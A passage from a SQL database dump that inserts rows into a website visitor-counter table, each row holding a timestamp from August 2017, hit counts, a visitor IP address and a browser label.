600,1,1,0,0,'94.130.32.58','firefox'),(143407,1502279676,1,1,0,0,'217.69.133.9','other'),(143408,1502279715,1,1,0,0,'137.74.207.161','other'),(143409,1502279933,1,1,0,0,'95.108.181.69','other'),(143410,1502280162,1,1,0,0,'51.255.65.88','other'),(143411,1502280172,1,1,0,0,'217.182.132.65','other'),(143412,1502280333,1,0,1,0,'66.249.66.76',''),(143413,1502280389,1,0,1,0,'66.249.66.155',''),(143414,1502280412,1,1,0,0,'46.201.175.91','firefox'),(143415,1502280414,1,1,0,0,'213.180.203.32','other'),(143416,1502281006,1,1,0,0,'37.9.113.94','other'),(143417,1502281010,1,1,0,0,'217.182.132.71','other'),(143418,1502281099,1,1,0,0,'91.196.177.46','other'),(143419,1502281255,1,1,0,0,'217.182.132.149','other'),(143420,1502281442,1,1,0,0,'92.113.195.178','firefox'),(143421,1502281674,1,1,0,0,'217.182.132.57','other'),(143422,1502281973,1,1,0,0,'8.29.198.25','other'),(143423,1502281976,3,3,0,0,'216.244.66.194','other'),(143424,1502282027,1,1,0,0,'51.255.65.9','other'),(143425,1502282258,1,1,0,0,'217.182.132.150','other'),(143426,1502282369,1,1,0,0,'66.249.66.156','chrome'),(143427,1502282385,1,1,0,0,'46.201.175.91','firefox'),(143428,1502282464,1,1,0,0,'35.184.189.105','other'),(143429,1502282498,7,7,0,0,'216.244.66.246','other'),(143430,1502282503,1,1,0,0,'157.55.39.205','other'),(143431,1502282714,1,1,0,0,'91.124.82.146','chrome'),(143432,1502282750,1,0,1,0,'68.180.229.59',''),(143433,1502282757,1,1,0,0,'217.182.132.33','other'),(143434,1502282898,1,1,0,0,'51.255.65.15','other'),(143435,1502283279,1,1,0,0,'217.182.132.53','other'),(143436,1502283352,1,1,0,0,'141.8.142.21','other'),(143437,1502283592,1,1,0,0,'51.255.65.26','other'),(143438,1502283877,1,0,1,0,'66.249.66.74',''),(143439,1502283880,1,1,0,0,'66.249.66.76','chrome'),(143440,1502283894,1,0,1,0,'66.249.66.155',''),(143441,1502283917,1,1,0,0,'217.182.132.92','other'),(143442,1502284034,1,1,0,0,'46.201.175.91','firefox'),(143443,1502284116,1,1,0,0,'217.182.132.190','other'),(143444,1502284165,1,1,0,0,'94.130.32.58','chrome'),(143445,1502284250,1,1,0,0,'51.255.65.40','other'),(143446,1502284502,1,1,0,0,'95.108.181.69','other'),(143447,1502284531,1,1,0,0,'178.92.155.68','chrome'),(143448,1502284557,1,1,0,0,'141.8.142.21','other'),(143449,1502285450,1,1,0,0,'157.55.39.197','other'),(143450,1502285582,2,2,0,0,'216.244.66.246','other'),(143451,1502285980,1,1,0,0,'91.196.178.69','chrome'),(143452,1502286417,1,1,0,0,'212.113.43.122','chrome'),(143453,1502286432,1,1,0,0,'51.255.71.131','other'),(143454,1502286572,1,1,0,0,'51.255.71.119','other'),(143455,1502286605,1,1,0,0,'77.222.155.89','chrome'),(143456,1502286624,1,1,0,0,'178.95.66.14','chrome'),(143457,1502286761,1,1,0,0,'46.201.175.91','firefox'),(143458,1502287111,1,1,0,0,'217.182.132.25','other'),(143459,1502287335,1,1,0,0,'51.255.65.50','other'),(143460,1502287488,1,1,0,0,'217.182.132.188','other'),(143461,1502287695,1,1,0,0,'37.9.113.163','other'),(143462,1502287791,9,9,0,0,'216.244.66.194','other'),(143463,1502288037,2,2,0,0,'95.108.181.63','other'),(143464,1502288607,1,0,1,0,'66.249.66.76',''),(143465,1502288680,1,1,0,0,'141.8.142.45','other'),(143466,1502288847,2,2,0,0,'37.9.113.94','other'),(143467,1502288936,1,1,0,0,'51.255.65.97','other'),(143468,1502289360,1,1,0,0,'95.134.203.26','firefox'),(143469,1502289445,1,1,0,0,'217.182.132.93','other'),(143470,1502289623,1,1,0,0,'217.69.133.9','other'),(143471,1502289792,1,1,0,0,'217.182.132.72','other'),(143472,1502290015,1,1,0,0,'216.244.66.246','other'),(143473,1502290056,1,1,0,0,'51.255.71.114','other'),(143474,1502290663,1,1,0,0,'141.8.142.21','other'),(143475,1502290739,1,1,0,0,'141.8.142.107','other'),(143476,1502291223,1,1,0,0,'178.154.200.7','other'),(143477,1502291274,1,1,0,0,'217.69.133.194','other'),(143478,1502291277,1,1,0,0,'217.69.133.4','other'),(143479,1502291570,1,1,0,0,'51.255.65.78','other'),(143480,1502291817,1,1,0,0,'51.255.65.51','other'),(143481,1502291879,1,0,1,0,'66.249.66.74',''),(143482,1502292363,1,1,0,0,'217.182.132.172','other'),(143483,1502292817,1,1,0,0,'8.29.198.25','other'),(143484,1502292848,1,1,0,0,'51.255.71.116','other'),(143485,1502293049,8,8,0,0,'216.244.66.246','other'),(143486,1502293153,1,1,0,0,'91.196.178.39','chrome'),(143487,1502293428,1,0,1,0,'66.249.66.75',''),(143488,1502293439,1,0,1,0,'66.249.66.156',''),(143489,1502293440,1,1,0,0,'217.182.132.53','other'),(143490,1502293526,2,2,0,0,'141.8.142.21','other'),(143491,1502293559,1,1,0,0,'213.180.203.32','other'),(143492,1502293580,1,0,1,0,'66.249.66.76',''),(143493,1502293712,1,1,0,0,'217.182.132.61','other'),(143494,1502293829,1,1,0,0,'51.255.65.81','other'),(143495,1502294059,1,0,1,0,'68.180.229.59',''),(143496,1502294266,1,1,0,0,'46.161.9.57','msie'),(143497,1502294725,1,1,0,0,'51.255.65.26','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (143498,1502294997,1,0,1,0,'66.249.66.157',''),(143499,1502295190,1,1,0,0,'217.69.133.194','other'),(143500,1502295291,1,1,0,0,'141.8.142.21','other'),(143501,1502295295,1,1,0,0,'141.8.183.1','other'),(143502,1502295487,1,1,0,0,'164.132.162.159','other'),(143503,1502295553,1,1,0,0,'217.182.132.30','other'),(143504,1502295619,1,1,0,0,'217.182.132.81','other'),(143505,1502296055,1,1,0,0,'217.182.132.83','other'),(143506,1502296606,1,1,0,0,'51.255.65.11','other'),(143507,1502296876,1,1,0,0,'51.255.65.17','other'),(143508,1502297060,1,1,0,0,'51.255.64.106','other'),(143509,1502297137,1,1,0,0,'51.255.65.51','other'),(143510,1502297408,3,3,0,0,'91.209.11.236','other'),(143511,1502297620,1,1,0,0,'51.255.65.85','other'),(143512,1502297639,2,2,0,0,'5.45.207.64','other'),(143513,1502297722,1,1,0,0,'5.254.65.28','chrome'),(143514,1502297792,1,1,0,0,'138.197.135.59','chrome'),(143515,1502298150,1,1,0,0,'91.124.82.146','chrome'),(143516,1502298365,4,4,0,0,'216.244.66.194','other'),(143517,1502298766,1,1,0,0,'137.74.207.164','other'),(143518,1502298817,1,1,0,0,'217.182.132.96','other'),(143519,1502298926,1,1,0,0,'91.196.178.161','chrome'),(143520,1502299124,2,2,0,0,'91.209.11.236','other'),(143521,1502299127,1,1,0,0,'91.196.178.162','chrome'),(143522,1502299269,1,1,0,0,'164.132.162.164','other'),(143523,1502299319,1,1,0,0,'31.13.113.198','other'),(143524,1502299320,1,1,0,0,'31.13.113.173','other'),(143525,1502299367,1,1,0,0,'91.196.178.39','chrome'),(143526,1502299432,1,1,0,0,'51.255.65.11','other'),(143527,1502299719,1,1,0,0,'185.148.27.45','opera'),(143528,1502299771,1,1,0,0,'178.154.200.7','other'),(143529,1502300277,1,1,0,0,'51.255.65.71','other'),(143530,1502300781,1,1,0,0,'217.69.133.3','other'),(143531,1502300796,1,0,1,0,'66.249.66.74',''),(143532,1502300816,1,1,0,0,'216.244.66.246','other'),(143533,1502301000,3,3,0,0,'141.8.183.1','other'),(143534,1502301046,1,1,0,0,'217.182.132.149','other'),(143535,1502301199,1,1,0,0,'51.255.65.60','other'),(143536,1502301400,1,1,0,0,'217.182.132.173','other'),(143537,1502301546,1,1,0,0,'217.182.132.52','other'),(143538,1502301612,1,1,0,0,'213.180.203.32','other'),(143539,1502301959,1,1,0,0,'37.115.135.231','chrome'),(143540,1502302575,1,1,0,0,'91.196.178.39','chrome'),(143541,1502303454,1,1,0,0,'164.132.162.154','other'),(143542,1502303581,1,1,0,0,'157.55.39.205','other'),(143543,1502303648,1,1,0,0,'8.29.198.25','other'),(143544,1502303666,1,1,0,0,'51.255.65.81','other'),(143545,1502303719,5,5,0,0,'216.244.66.246','other'),(143546,1502303786,1,1,0,0,'51.255.65.35','other'),(143547,1502303801,1,1,0,0,'180.76.15.142','other'),(143548,1502303814,1,1,0,0,'213.180.203.32','other'),(143549,1502303836,1,1,0,0,'51.255.65.27','other'),(143550,1502303951,5,5,0,0,'216.244.66.194','other'),(143551,1502304102,1,1,0,0,'178.154.200.7','other'),(143552,1502304204,1,1,0,0,'91.209.11.236','other'),(143553,1502304814,4,4,0,0,'69.30.211.2','other'),(143554,1502304995,2,2,0,0,'141.8.142.21','other'),(143555,1502305131,1,1,0,0,'51.255.71.113','other'),(143556,1502305378,1,1,0,0,'207.46.13.99','other'),(143557,1502305461,1,1,0,0,'91.196.178.34','chrome'),(143558,1502305680,1,1,0,0,'217.182.132.81','other'),(143559,1502305691,4,4,0,0,'216.244.66.194','other'),(143560,1502305845,1,1,0,0,'138.197.135.59','chrome'),(143561,1502306321,1,1,0,0,'91.209.11.236','other'),(143562,1502306604,1,1,0,0,'185.137.19.138','chrome'),(143563,1502306741,1,1,0,0,'217.182.132.65','other'),(143564,1502306938,1,1,0,0,'157.55.39.197','other'),(143565,1502307052,1,1,0,0,'51.255.65.81','other'),(143566,1502307466,1,1,0,0,'164.132.162.188','other'),(143567,1502307515,1,1,0,0,'217.182.132.55','other'),(143568,1502307521,1,1,0,0,'5.45.207.66','other'),(143569,1502307902,1,1,0,0,'217.182.132.95','other'),(143570,1502307951,1,1,0,0,'217.182.132.188','other'),(143571,1502308308,1,0,1,0,'66.249.66.76',''),(143572,1502308317,1,0,1,0,'66.249.66.157',''),(143573,1502308351,1,1,0,0,'95.108.181.58','other'),(143574,1502308386,1,1,0,0,'91.209.11.236','other'),(143575,1502308467,1,1,0,0,'51.255.71.100','other'),(143576,1502308935,1,1,0,0,'51.255.65.30','other'),(143577,1502309034,1,1,0,0,'173.208.173.138','other'),(143578,1502309592,1,1,0,0,'91.196.178.129','chrome'),(143579,1502309693,1,1,0,0,'138.197.176.194','other'),(143580,1502309754,1,1,0,0,'5.255.253.4','other'),(143581,1502309805,1,1,0,0,'217.182.132.95','other'),(143582,1502309902,1,1,0,0,'91.209.11.236','other'),(143583,1502309907,1,1,0,0,'35.184.189.105','other'),(143584,1502309922,1,1,0,0,'51.255.65.74','other'),(143585,1502310721,1,1,0,0,'95.133.228.114','chrome'),(143586,1502310728,2,0,2,0,'66.249.66.75',''),(143587,1502310939,1,1,0,0,'141.8.142.21','other'),(143588,1502311791,1,1,0,0,'51.255.65.5','other'),(143589,1502311892,1,1,0,0,'91.209.11.236','other'),(143590,1502312053,1,1,0,0,'178.154.200.7','other'),(143591,1502312339,1,1,0,0,'157.55.39.153','other'),(143592,1502312638,2,2,0,0,'141.8.183.1','other'),(143593,1502312646,1,1,0,0,'5.45.207.64','other'),(143594,1502312949,12,12,0,0,'216.244.66.194','other'),(143595,1502313292,1,1,0,0,'51.255.65.53','other'),(143596,1502313427,1,0,1,0,'66.249.66.156',''),(143597,1502313451,1,0,1,0,'66.249.66.76',''),(143598,1502313466,1,1,0,0,'217.182.132.74','other'),(143599,1502313645,1,1,0,0,'66.249.66.156','chrome'),(143600,1502313715,1,1,0,0,'66.249.66.155','chrome'),(143601,1502314092,1,1,0,0,'66.249.66.74','chrome'),(143602,1502314097,1,0,1,0,'66.249.66.75',''),(143603,1502314307,3,3,0,0,'216.244.66.246','other'),(143604,1502314479,1,1,0,0,'141.8.142.45','other'),(143605,1502314484,1,1,0,0,'8.29.198.27','other'),(143606,1502314838,1,1,0,0,'66.249.66.155','chrome'),(143607,1502315021,1,0,1,0,'66.249.66.156',''),(143608,1502315231,1,0,1,0,'66.249.66.76',''),(143609,1502315242,1,1,0,0,'91.209.11.236','other'),(143610,1502315262,3,3,0,0,'216.244.66.246','other'),(143612,1502315405,1,1,0,0,'157.55.39.153','other'),(143613,1502315533,1,1,0,0,'37.9.113.180','other'),(143614,1502316162,1,1,0,0,'51.255.65.224','other'),(143615,1502316276,1,1,0,0,'217.182.132.95','other'),(143616,1502316423,1,1,0,0,'137.74.207.102','other'),(143617,1502316636,1,1,0,0,'51.255.65.31','other'),(143618,1502316739,1,1,0,0,'51.255.65.60','other'),(143619,1502316991,1,0,1,0,'66.249.79.93',''),(143620,1502317218,1,1,0,0,'217.182.132.185','other'),(143621,1502317441,1,1,0,0,'217.69.133.9','other'),(143622,1502317504,1,1,0,0,'5.45.207.64','other'),(143623,1502317828,1,0,1,0,'66.249.66.75',''),(143624,1502318225,1,1,0,0,'51.255.71.127','other'),(143625,1502318378,1,0,1,0,'66.249.66.76',''),(143626,1502318422,1,0,1,0,'66.249.66.156',''),(143627,1502318549,1,1,0,0,'51.255.71.112','other'),(143628,1502318620,1,1,0,0,'40.77.167.99','other'),(143629,1502318857,1,1,0,0,'141.8.183.1','other'),(143630,1502318943,1,1,0,0,'91.209.11.236','other'),(143631,1502319122,1,1,0,0,'141.8.142.56','other'),(143632,1502319643,1,1,0,0,'216.244.66.194','other'),(143633,1502319691,1,1,0,0,'51.255.71.131','other'),(143634,1502320164,1,1,0,0,'51.255.65.5','other'),(143635,1502320616,1,1,0,0,'94.130.32.58','chrome'),(143636,1502320657,1,1,0,0,'51.255.65.9','other'),(143637,1502320686,1,1,0,0,'51.255.65.36','other'),(143638,1502320688,1,1,0,0,'217.182.132.75','other'),(143639,1502320940,1,0,1,0,'66.249.66.76',''),(143640,1502321068,1,1,0,0,'51.255.71.117','other'),(143641,1502322256,1,1,0,0,'66.249.66.156','chrome'),(143642,1502322271,1,1,0,0,'217.182.132.72','other'),(143643,1502322396,1,1,0,0,'95.108.181.58','other'),(143644,1502322622,1,1,0,0,'217.182.132.71','other'),(143645,1502322840,3,3,0,0,'216.244.66.194','other'),(143646,1502322850,1,1,0,0,'51.255.71.113','other'),(143647,1502323448,1,1,0,0,'141.8.142.21','other'),(143648,1502323492,1,1,0,0,'217.182.132.179','other'),(143649,1502323532,1,1,0,0,'164.132.162.164','other'),(143650,1502323692,1,1,0,0,'37.9.113.195','other'),(143651,1502323697,1,1,0,0,'5.45.207.64','other'),(143652,1502323699,1,1,0,0,'95.108.181.69','other'),(143653,1502323994,1,1,0,0,'51.255.71.111','other'),(143654,1502324218,1,1,0,0,'141.8.183.1','other'),(143655,1502324289,1,0,1,0,'66.249.66.75',''),(143656,1502324310,6,6,0,0,'216.244.66.246','other'),(143657,1502324346,1,1,0,0,'157.55.39.205','other'),(143658,1502324919,1,1,0,0,'5.255.253.2','other'),(143659,1502325242,1,1,0,0,'217.182.132.187','other'),(143660,1502325267,1,1,0,0,'51.255.65.35','other'),(143661,1502325321,1,1,0,0,'8.29.198.27','other'),(143662,1502325378,1,0,1,0,'66.249.66.76',''),(143663,1502325613,3,3,0,0,'216.244.66.246','other'),(143664,1502326128,1,1,0,0,'95.143.29.33','chrome'),(143665,1502326204,1,1,0,0,'141.8.142.25','other'),(143666,1502326208,1,1,0,0,'178.154.200.7','other'),(143667,1502326863,1,1,0,0,'178.255.215.94','other'),(143668,1502327142,1,1,0,0,'157.55.39.205','other'),(143669,1502327163,1,0,1,0,'66.249.66.76',''),(143670,1502327168,1,0,1,0,'66.249.66.74',''),(143671,1502327323,1,1,0,0,'51.255.65.28','other'),(143672,1502327814,1,1,0,0,'178.154.200.27','other'),(143673,1502328464,1,1,0,0,'151.80.27.118','other'),(143674,1502329104,1,1,0,0,'51.255.65.95','other'),(143675,1502329112,1,1,0,0,'51.255.65.34','other'),(143676,1502329566,1,0,1,0,'66.249.66.156',''),(143677,1502329880,1,1,0,0,'217.182.132.70','other'),(143678,1502330354,1,1,0,0,'217.182.132.5','other'),(143679,1502330898,1,1,0,0,'51.255.65.74','other'),(143680,1502331053,1,1,0,0,'51.255.65.18','other'),(143681,1502331268,1,1,0,0,'51.255.65.66','other'),(143682,1502331924,1,1,0,0,'5.45.207.56','other'),(143683,1502331951,1,1,0,0,'141.8.142.21','other'),(143684,1502332639,1,1,0,0,'151.80.27.118','other'),(143685,1502332817,3,3,0,0,'216.244.66.246','other'),(143686,1502333524,1,1,0,0,'37.73.235.11','chrome'),(143687,1502333833,1,1,0,0,'216.244.66.246','other'),(143688,1502333838,1,1,0,0,'141.8.183.1','other'),(143689,1502333988,1,1,0,0,'217.69.133.3','other'),(143690,1502334009,2,2,0,0,'216.244.66.194','other'),(143691,1502334132,1,1,0,0,'51.255.65.20','other'),(143692,1502334209,1,1,0,0,'5.45.207.64','other'),(143693,1502334257,1,1,0,0,'80.70.77.132','firefox'),(143694,1502334324,1,1,0,0,'51.255.71.117','other'),(143695,1502334939,3,3,0,0,'216.244.66.194','other'),(143696,1502334947,1,1,0,0,'141.8.183.1','other'),(143697,1502335244,1,0,1,0,'66.249.66.74',''),(143698,1502335541,1,1,0,0,'107.167.108.137','other'),(143699,1502335654,1,1,0,0,'217.182.132.28','other'),(143700,1502336146,1,1,0,0,'8.29.198.25','other'),(143701,1502336347,1,1,0,0,'173.212.226.236','other'),(143702,1502336754,1,1,0,0,'217.182.132.73','other'),(143703,1502336942,1,0,1,0,'66.249.66.157',''),(143704,1502337221,1,1,0,0,'141.8.142.107','other'),(143705,1502337491,1,1,0,0,'51.255.65.50','other'),(143706,1502337628,1,1,0,0,'151.80.27.118','other'),(143707,1502337679,1,1,0,0,'178.154.200.7','other'),(143708,1502337990,2,1,1,0,'66.249.66.155',''),(143709,1502338184,1,1,0,0,'91.196.178.66','firefox'),(143710,1502338401,2,0,2,0,'66.249.66.74',''),(143711,1502338549,1,1,0,0,'207.46.13.99','other'),(143712,1502338678,1,1,0,0,'66.249.66.156','chrome'),(143713,1502338835,1,1,0,0,'137.74.207.120','other'),(143714,1502339142,1,1,0,0,'141.8.142.21','other'),(143715,1502340174,1,1,0,0,'89.22.207.111','other'),(143716,1502340625,1,1,0,0,'5.45.207.64','other'),(143717,1502341116,2,2,0,0,'92.113.124.118','chrome'),(143718,1502341762,1,1,0,0,'157.55.39.153','other'),(143719,1502341882,1,1,0,0,'66.249.66.75','chrome'),(143720,1502341967,1,1,0,0,'91.196.178.40','chrome'),(143721,1502342231,1,1,0,0,'91.196.178.68','firefox'),(143722,1502342839,1,1,0,0,'164.132.162.155','other'),(143723,1502342885,1,1,0,0,'151.80.27.118','other'),(143724,1502343027,1,1,0,0,'91.196.178.69','chrome'),(143725,1502343234,1,1,0,0,'141.8.142.83','other'),(143726,1502343475,1,1,0,0,'51.255.65.48','other'),(143727,1502343572,1,1,0,0,'5.45.207.64','other'),(143728,1502343925,1,0,1,0,'66.249.66.156',''),(143729,1502344026,2,2,0,0,'91.196.178.69','chrome'),(143730,1502344137,1,1,0,0,'51.255.65.86','other'),(143731,1502344224,4,4,0,0,'216.244.66.194','other'),(143732,1502344478,1,1,0,0,'51.255.65.224','other'),(143733,1502344970,1,1,0,0,'91.196.178.69','chrome'),(143734,1502345874,1,1,0,0,'46.185.123.199','chrome'),(143735,1502346013,6,6,0,0,'213.136.73.195','other'),(143736,1502346152,5,5,0,0,'216.244.66.246','other'),(143737,1502346364,1,1,0,0,'91.196.178.71','chrome'),(143738,1502346590,1,1,0,0,'51.255.65.17','other'),(143739,1502346613,1,1,0,0,'216.244.66.194','other'),(143740,1502346777,1,1,0,0,'217.69.133.6','other'),(143741,1502346982,1,1,0,0,'8.29.198.25','other'),(143742,1502347118,1,1,0,0,'217.182.132.29','other'),(143743,1502347588,1,1,0,0,'217.182.132.17','other'),(143744,1502347984,1,0,1,0,'66.249.66.157',''),(143745,1502348349,1,1,0,0,'5.45.207.64','other'),(143746,1502349132,3,3,0,0,'216.244.66.246','other'),(143747,1502349519,1,1,0,0,'217.182.132.72','other'),(143748,1502349539,1,1,0,0,'51.255.65.90','other'),(143749,1502349704,1,1,0,0,'213.180.203.32','other'),(143750,1502349762,1,1,0,0,'51.255.65.53','other'),(143751,1502350182,1,1,0,0,'51.255.65.92','other'),(143752,1502350285,1,1,0,0,'130.180.218.1','firefox'),(143753,1502350838,1,1,0,0,'91.196.177.46','firefox'),(143754,1502351422,1,1,0,0,'91.209.11.236','other'),(143755,1502351825,1,1,0,0,'217.182.132.68','other'),(143756,1502352268,1,1,0,0,'216.244.66.194','other'),(143757,1502352306,1,1,0,0,'178.95.67.132','firefox'),(143758,1502352382,1,1,0,0,'51.255.65.82','other'),(143759,1502352406,1,1,0,0,'141.8.183.1','other'),(143760,1502352633,1,1,0,0,'95.132.16.179','firefox'),(143761,1502353825,1,0,1,0,'66.249.66.156',''),(143762,1502354108,1,1,0,0,'91.209.11.236','other'),(143763,1502354173,1,1,0,0,'141.8.142.21','other'),(143764,1502354182,1,1,0,0,'213.180.203.32','other'),(143765,1502354332,5,5,0,0,'216.244.66.246','other'),(143766,1502354533,1,1,0,0,'217.182.132.62','other'),(143767,1502355135,1,1,0,0,'5.45.207.64','other'),(143768,1502355436,1,1,0,0,'217.182.132.148','other'),(143769,1502355557,1,1,0,0,'91.196.178.162','chrome'),(143770,1502355749,8,8,0,0,'216.244.66.194','other'),(143771,1502355789,1,1,0,0,'91.196.178.71','chrome'),(143772,1502355978,1,1,0,0,'141.8.142.21','other'),(143773,1502356824,1,1,0,0,'91.196.178.69','chrome'),(143774,1502356849,1,1,0,0,'51.255.65.44','other'),(143775,1502357174,1,1,0,0,'5.45.207.64','other'),(143776,1502357178,1,1,0,0,'213.180.203.32','other'),(143777,1502357185,1,1,0,0,'37.9.113.163','other'),(143778,1502357189,1,1,0,0,'141.8.142.107','other'),(143779,1502357209,1,1,0,0,'217.69.133.9','other'),(143780,1502357419,1,1,0,0,'95.108.181.63','other'),(143781,1502357629,1,1,0,0,'217.182.132.18','other'),(143782,1502357639,1,1,0,0,'207.46.13.152','other'),(143783,1502357799,1,1,0,0,'91.196.178.69','chrome'),(143784,1502357805,1,1,0,0,'8.29.198.26','other'),(143785,1502358735,1,1,0,0,'137.74.207.114','other'),(143786,1502358857,1,1,0,0,'35.184.189.105','other'),(143787,1502358988,1,1,0,0,'46.201.175.91','firefox'),(143788,1502359417,1,1,0,0,'51.255.65.49','other'),(143789,1502359543,1,1,0,0,'164.132.162.164','other'),(143790,1502359544,4,4,0,0,'216.244.66.246','other'),(143791,1502359615,1,1,0,0,'51.255.65.69','other'),(143792,1502359762,1,1,0,0,'180.76.15.33','other'),(143793,1502359847,1,1,0,0,'91.196.178.68','firefox'),(143794,1502360041,1,1,0,0,'91.196.178.71','chrome'),(143795,1502360158,1,1,0,0,'37.9.113.163','other'),(143796,1502360640,1,1,0,0,'185.128.214.49','chrome'),(143797,1502361775,1,1,0,0,'164.132.162.153','other'),(143798,1502361903,1,1,0,0,'51.255.65.70','other'),(143799,1502361957,1,1,0,0,'5.45.207.64','other'),(143800,1502362387,1,1,0,0,'217.182.132.68','other'),(143801,1502362408,1,1,0,0,'51.255.65.50','other'),(143802,1502362545,1,1,0,0,'178.154.200.7','other'),(143803,1502362839,1,1,0,0,'217.69.133.9','other'),(143804,1502362849,1,1,0,0,'176.38.188.53','chrome'),(143805,1502363012,1,1,0,0,'5.45.207.64','other'),(143806,1502363150,1,1,0,0,'51.255.71.128','other'),(143807,1502363246,1,1,0,0,'213.180.203.32','other'),(143808,1502363270,1,1,0,0,'94.130.32.58','chrome'),(143809,1502363423,1,1,0,0,'128.199.42.73','chrome'),(143810,1502363625,1,1,0,0,'185.137.17.77','chrome'),(143811,1502363649,1,1,0,0,'216.244.66.246','other'),(143812,1502363920,1,0,1,0,'68.180.229.59',''),(143813,1502363936,1,1,0,0,'137.74.201.99','other'),(143814,1502364320,1,1,0,0,'91.196.178.68','firefox'),(143815,1502364575,1,1,0,0,'141.8.183.1','other'),(143816,1502364644,1,1,0,0,'185.137.18.223','chrome'),(143817,1502364729,1,0,1,0,'66.249.66.156',''),(143818,1502364897,1,1,0,0,'66.249.66.155','chrome'),(143819,1502365374,1,1,0,0,'216.244.66.246','other'),(143820,1502365431,1,0,1,0,'66.249.66.75',''),(143821,1502365538,14,14,0,0,'216.244.66.194','other'),(143822,1502365943,1,1,0,0,'95.108.181.63','other'),(143823,1502366104,1,1,0,0,'46.201.175.91','firefox'),(143824,1502366232,1,1,0,0,'51.255.65.73','other'),(143825,1502366838,1,1,0,0,'94.130.32.58','chrome'),(143826,1502367729,7,7,0,0,'216.244.66.246','other'),(143827,1502367772,1,1,0,0,'217.182.132.20','other'),(143828,1502367805,1,1,0,0,'51.255.71.111','other'),(143829,1502367953,2,2,0,0,'141.8.142.21','other'),(143830,1502367957,1,1,0,0,'141.8.183.1','other'),(143831,1502368039,1,1,0,0,'217.182.132.29','other'),(143832,1502368632,1,1,0,0,'51.255.65.60','other'),(143833,1502368637,1,1,0,0,'8.29.198.26','other'),(143834,1502368860,1,1,0,0,'91.196.178.69','chrome'),(143835,1502368952,1,1,0,0,'137.74.201.100','other'),(143836,1502369341,1,1,0,0,'37.115.80.235','chrome'),(143837,1502369407,1,1,0,0,'95.158.3.62','chrome'),(143838,1502369516,1,1,0,0,'157.55.39.205','other'),(143839,1502369606,1,0,1,0,'66.249.66.74',''),(143840,1502369673,1,1,0,0,'46.165.197.142','other'),(143841,1502369993,1,1,0,0,'5.45.207.64','other'),(143842,1502371441,1,1,0,0,'46.201.175.91','firefox'),(143843,1502371870,3,3,0,0,'91.209.11.236','other'),(143844,1502372113,1,1,0,0,'37.9.113.163','other'),(143845,1502372127,1,1,0,0,'41.212.121.79','firefox'),(143846,1502372344,1,1,0,0,'195.211.175.37','chrome'),(143847,1502372386,1,1,0,0,'213.180.203.32','other'),(143848,1502372683,1,1,0,0,'217.182.132.15','other'),(143849,1502372809,1,1,0,0,'217.182.132.170','other'),(143850,1502373529,1,1,0,0,'46.201.175.91','firefox'),(143851,1502373831,1,1,0,0,'141.8.183.1','other'),(143852,1502374114,1,1,0,0,'91.196.178.68','firefox'),(143853,1502374146,2,2,0,0,'91.209.11.236','other'),(143854,1502374535,1,1,0,0,'157.55.39.153','other'),(143855,1502375184,4,4,0,0,'216.244.66.194','other'),(143856,1502375388,2,2,0,0,'95.108.181.69','other'),(143857,1502375675,1,1,0,0,'91.209.11.236','other'),(143858,1502376137,2,2,0,0,'178.154.200.7','other'),(143859,1502376158,1,1,0,0,'51.255.71.126','other'),(143860,1502376469,1,0,1,0,'66.249.66.75',''),(143861,1502376683,4,4,0,0,'216.244.66.246','other'),(143862,1502376729,1,1,0,0,'217.182.132.177','other'),(143863,1502377074,1,1,0,0,'51.255.65.36','other'),(143864,1502377392,1,1,0,0,'51.255.65.82','other'),(143865,1502377427,2,2,0,0,'216.244.66.194','other'),(143866,1502377613,1,1,0,0,'178.154.200.27','other'),(143867,1502377769,1,1,0,0,'91.209.11.236','other'),(143868,1502378065,1,1,0,0,'217.182.132.69','other'),(143869,1502378413,1,1,0,0,'157.55.39.205','other'),(143870,1502378624,5,5,0,0,'5.9.61.111','other'),(143871,1502379113,1,1,0,0,'217.182.132.52','other'),(143872,1502379118,1,1,0,0,'137.74.207.164','other'),(143873,1502379265,3,3,0,0,'216.244.66.246','other'),(143874,1502379333,1,1,0,0,'157.55.39.205','other'),(143875,1502379467,1,1,0,0,'8.29.198.26','other'),(143876,1502379724,1,1,0,0,'141.8.183.5','other'),(143877,1502380108,2,2,0,0,'141.8.183.1','other'),(143878,1502380323,1,1,0,0,'217.182.132.180','other'),(143879,1502381518,1,1,0,0,'51.255.65.92','other'),(143880,1502381743,1,1,0,0,'217.182.132.90','other'),(143881,1502382709,1,1,0,0,'94.130.32.58','chrome'),(143882,1502383632,1,0,1,0,'66.249.66.75',''),(143883,1502383736,1,0,1,0,'66.249.66.76',''),(143884,1502383756,1,0,1,0,'66.249.66.157',''),(143885,1502383913,1,1,0,0,'157.55.39.205','other'),(143886,1502384180,1,1,0,0,'217.182.132.86','other'),(143887,1502384495,1,1,0,0,'217.182.132.178','other'),(143888,1502385329,1,1,0,0,'51.255.65.87','other'),(143889,1502385679,1,1,0,0,'157.55.39.205','other'),(143890,1502385847,1,1,0,0,'5.45.207.64','other'),(143891,1502385859,1,1,0,0,'217.182.132.31','other'),(143892,1502385973,1,1,0,0,'164.132.162.164','other'),(143893,1502386450,5,5,0,0,'216.244.66.194','other'),(143894,1502386486,1,1,0,0,'51.255.65.89','other'),(143895,1502386816,1,1,0,0,'217.182.132.28','other'),(143896,1502387171,1,1,0,0,'5.45.207.64','other'),(143897,1502387682,1,0,1,0,'66.249.66.76',''),(143898,1502387913,1,1,0,0,'164.132.164.180','other'),(143899,1502387968,1,1,0,0,'94.130.32.58','other'),(143900,1502387976,1,1,0,0,'217.182.132.33','other'),(143901,1502388185,1,1,0,0,'217.182.132.56','other'),(143902,1502388525,1,1,0,0,'207.46.13.99','other'),(143903,1502388709,1,1,0,0,'51.255.65.22','other'),(143904,1502389016,37,37,0,0,'94.199.151.22','other'),(143905,1502389209,1,1,0,0,'37.54.16.139','chrome'),(143906,1502389462,1,1,0,0,'51.255.71.121','other'),(143907,1502389690,1,1,0,0,'207.46.13.140','other'),(143908,1502389763,1,1,0,0,'91.124.238.193','chrome'),(143909,1502390293,1,1,0,0,'8.29.198.26','other'),(143910,1502390324,1,1,0,0,'194.24.236.186','other'),(143911,1502390637,1,1,0,0,'95.108.181.63','other'),(143912,1502390724,1,1,0,0,'95.108.181.69','other'),(143913,1502390930,1,1,0,0,'217.69.133.9','other'),(143914,1502390940,1,1,0,0,'217.69.133.2','other'),(143915,1502391246,1,1,0,0,'204.79.180.21','msie'),(143916,1502392524,2,0,2,0,'66.249.66.75',''),(143917,1502392612,1,0,1,0,'66.249.66.74',''),(143918,1502392651,1,1,0,0,'207.46.13.140','other'),(143919,1502392667,2,2,